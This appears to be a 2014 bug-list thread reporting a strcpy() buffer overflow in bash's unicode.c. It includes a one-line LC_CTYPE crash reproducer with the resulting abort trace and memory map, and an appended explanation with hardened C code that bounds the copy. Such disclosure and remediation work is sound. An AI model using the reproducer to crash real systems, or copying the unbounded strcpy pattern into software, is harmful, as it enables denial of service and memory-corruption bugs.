On Mon 11 Aug 2014 21:07:06 Hádrian R wrote:
> Hi, I'm Hádrien Romero Soria - @Kaiwaiata, I am a 16-year-old boy,
> passionate about computer security; for more than 8h I have been searching
> and finding various possible vulnerabilities in the source code of bash.
> I will tell you one vulnerability now; if they treat me well I will tell
> the other.
>
> foolish or important things?
>
> unsafe use of strcpy():
>
> bash-4.3.tar\bash-4.3\lib\sh\unicode.c:
> line 87: strcpy (charsetbuf, locale);
>
> # if an attacker manages to take control of charsetbuf[40];, it may cause
> a buffer overflow, which would be directed toward .bss; it's not too
> dangerous but is a vulnerability.
depending on the build system, yes, you can trigger a buffer overflow here.
all you have to do is set LC_CTYPE to a long string. like so:

$ bash -c "LC_CTYPE='$(printf %100sf)' printf '\U8f7f7f20'"
bash: warning: setlocale: LC_CTYPE: cannot change locale ( f): No such file or directory
*** buffer overflow detected ***: bash terminated
======= Backtrace: =========
/lib64/libc.so.6(+0x759fb)[0x7f26630e59fb]
/lib64/libc.so.6(__fortify_fail+0x47)[0x7f266316fde7]
/lib64/libc.so.6(+0xfdcd0)[0x7f266316dcd0]
bash[0x47e3ec]
bash[0x46e1bd]
bash[0x46eec1]
bash[0x41c28e]
bash[0x41e454]
bash[0x41f526]
bash[0x461f24]
bash[0x4098c4]
bash[0x408786]
/lib64/libc.so.6(__libc_start_main+0xf0)[0x7f2663090050]
bash[0x40947b]
======= Memory map: ========
00400000-004ae000 r-xp 00000000 08:32 1311338 /bin/bash
006ad000-006ae000 r--p 000ad000 08:32 1311338 /bin/bash
006ae000-006b2000 rw-p 000ae000 08:32 1311338 /bin/bash
006b2000-006bc000 rw-p 00000000 00:00 0
01e34000-01e55000 rw-p 00000000 00:00 0 [heap]
7f2662a8d000-7f2662aa3000 r-xp 00000000 08:32 1864333 /usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662aa3000-7f2662ca2000 ---p 00016000 08:32 1864333 /usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca2000-7f2662ca3000 r--p 00015000 08:32 1864333 /usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca3000-7f2662ca4000 rw-p 00016000 08:32 1864333 /usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca4000-7f2663070000 r--p 00000000 08:32 6705881 /usr/lib64/locale/locale-archive
7f2663070000-7f2663215000 r-xp 00000000 08:32 4459482 /lib64/libc-2.19.so
7f2663215000-7f2663415000 ---p 001a5000 08:32 4459482 /lib64/libc-2.19.so
7f2663415000-7f2663419000 r--p 001a5000 08:32 4459482 /lib64/libc-2.19.so
7f2663419000-7f266341b000 rw-p 001a9000 08:32 4459482 /lib64/libc-2.19.so
7f266341b000-7f266341f000 rw-p 00000000 00:00 0
7f266341f000-7f266346e000 r-xp 00000000 08:32 4460698 /lib64/libncurses.so.5.9
7f266346e000-7f266366e000 ---p 0004f000 08:32 4460698 /lib64/libncurses.so.5.9
7f266366e000-7f2663672000 r--p 0004f000 08:32 4460698 /lib64/libncurses.so.5.9
7f2663672000-7f2663673000 rw-p 00053000 08:32 4460698 /lib64/libncurses.so.5.9
7f2663673000-7f2663674000 rw-p 00000000 00:00 0
7f2663674000-7f266367c000 r-xp 00000000 08:32 4458169 /lib64/libhistory.so.6.3
7f266367c000-7f266387c000 ---p 00008000 08:32 4458169 /lib64/libhistory.so.6.3
7f266387c000-7f266387d000 r--p 00008000 08:32 4458169 /lib64/libhistory.so.6.3
7f266387d000-7f266387e000 rw-p 00009000 08:32 4458169 /lib64/libhistory.so.6.3
7f266387e000-7f26638bf000 r-xp 00000000 08:32 4458167 /lib64/libreadline.so.6.3
7f26638bf000-7f2663abf000 ---p 00041000 08:32 4458167 /lib64/libreadline.so.6.3
7f2663abf000-7f2663ac1000 r--p 00041000 08:32 4458167 /lib64/libreadline.so.6.3
7f2663ac1000-7f2663ac7000 rw-p 00043000 08:32 4458167 /lib64/libreadline.so.6.3
7f2663ac7000-7f2663ac9000 rw-p 00000000 00:00 0
7f2663ac9000-7f2663aeb000 r-xp 00000000 08:32 4459479 /lib64/ld-2.19.so
7f2663c72000-7f2663c76000 rw-p 00000000 00:00 0
7f2663ce0000-7f2663ce2000 rw-p 00000000 00:00 0
7f2663ce2000-7f2663ce9000 r--s 00000000 08:32 6705883 /usr/lib64/gconv/gconv-modules.cache
7f2663ce9000-7f2663cea000 rw-p 00000000 00:00 0
7f2663cea000-7f2663ceb000 r--p 00021000 08:32 4459479 /lib64/ld-2.19.so
7f2663ceb000-7f2663cec000 rw-p 00022000 08:32 4459479 /lib64/ld-2.19.so
7f2663cec000-7f2663ced000 rw-p 00000000 00:00 0
7fff04d0e000-7fff04d30000 rw-p 00000000 00:00 0 [stack]
7fff04dff000-7fff04e00000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Aborted (core dumped)

-mike
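The defect discussed in the thread above is the classic unbounded-copy pattern: a locale name taken from the LC_CTYPE environment variable is copied with strcpy() into a fixed charsetbuf[40], and the FORTIFY_SOURCE abort in the reply shows a long LC_CTYPE overrunning it. The C program below is an added example, not bash's own source, showing how the same charset-from-locale derivation can be written with an explicit length check so that an overlong value is rejected rather than written past the buffer. The function names, the "ASCII" fallback and the "@modifier" stripping are assumptions made for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not bash's code): same 40-byte buffer size as the report. */
#define CHARSETBUF_LEN 40

/* Bounded replacement for strcpy(): returns 0 on success, -1 when `src`
 * plus its terminating NUL would not fit in `dstlen` bytes. The caller
 * gets an explicit failure instead of a silent overrun or truncation. */
static int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);  /* n + 1 includes the NUL */
    return 0;
}

/* Hypothetical hardened helper: derive a charset name from a locale string
 * ("UTF-8" from "en_US.UTF-8@euro", "ASCII" for an empty locale, the whole
 * string when it has no '.'), never writing more than `outlen` bytes.
 * Returns 0 on success, -1 when the input would not fit. */
int charset_from_locale(char *out, size_t outlen, const char *locale)
{
    const char *dot;
    char *at;

    if (locale == NULL || *locale == '\0')
        return copy_bounded(out, outlen, "ASCII");

    dot = strrchr(locale, '.');
    if (copy_bounded(out, outlen, dot ? dot + 1 : locale) != 0)
        return -1;            /* overlong LC_CTYPE: refuse it */

    at = strchr(out, '@');    /* drop a "@modifier" suffix such as "@euro" */
    if (at)
        *at = '\0';
    return 0;
}

/* Check helper: 1 when `locale` is accepted and yields `expected`,
 * 0 when accepted with a different value, -1 when rejected. */
int charset_check(const char *locale, const char *expected)
{
    char buf[CHARSETBUF_LEN];
    if (charset_from_locale(buf, sizeof buf, locale) != 0)
        return -1;
    return strcmp(buf, expected) == 0;
}

/* Constructed input: a locale of `len` 'f' characters, like the printf
 * padding trick in the thread. Returns 1 if the bound check rejects it. */
int rejects_overlong(size_t len)
{
    char buf[CHARSETBUF_LEN];
    char *s = malloc(len + 1);
    int rc;
    if (s == NULL)
        return 0;
    memset(s, 'f', len);
    s[len] = '\0';
    rc = charset_from_locale(buf, sizeof buf, s);
    free(s);
    return rc == -1;
}

int main(void)
{
    const char *lc = getenv("LC_CTYPE");
    char buf[CHARSETBUF_LEN];

    if (charset_from_locale(buf, sizeof buf, lc) != 0) {
        fprintf(stderr, "LC_CTYPE too long (%zu bytes), using ASCII\n",
                strlen(lc));
        copy_bounded(buf, sizeof buf, "ASCII");
    }
    printf("charset: %s\n", buf);
    return 0;
}
```

Run as a normal program it prints the charset derived from your own LC_CTYPE; with a 100-character LC_CTYPE it reports the rejection and falls back instead of aborting. The important design choice is that copy_bounded() fails loudly rather than truncating: a silently shortened charset name would pass a garbage value downstream, whereas an explicit error lets the caller pick a safe default.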